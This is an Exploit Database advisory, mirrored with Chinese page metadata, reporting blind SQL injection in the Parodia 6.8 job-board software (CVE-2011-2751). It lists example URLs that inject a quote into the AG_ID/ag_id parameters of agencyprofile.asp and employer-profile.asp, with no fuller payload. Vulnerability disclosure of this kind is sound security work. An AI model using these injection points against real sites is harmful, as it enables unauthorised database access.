Parodia 6.8 – ’employer-profile.asp’ SQL Injection

• Exploit Database
• 39 阅读

• 作者： Carlos Mario Penagos Hollmann
  日期： 2012-06-25
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/19394/

• # Exploit Title: Parodia 6.8 and early SQL injection
  # Date: June 24 2012
  # Exploit Author:Carlos Mario Penagos Hollmann
  # Vendor Homepage: http://www.parodia.net/
  # Version: 6.8
  # CVE : CVE-2011-2751
  
  
  
  http://server/' ---> blind SQL
  
  http://server/agencyprofile.asp?AG_ID='
  http://server/employer-profile.asp?ag_id='
  
  There are other SQL Blindinjections ;)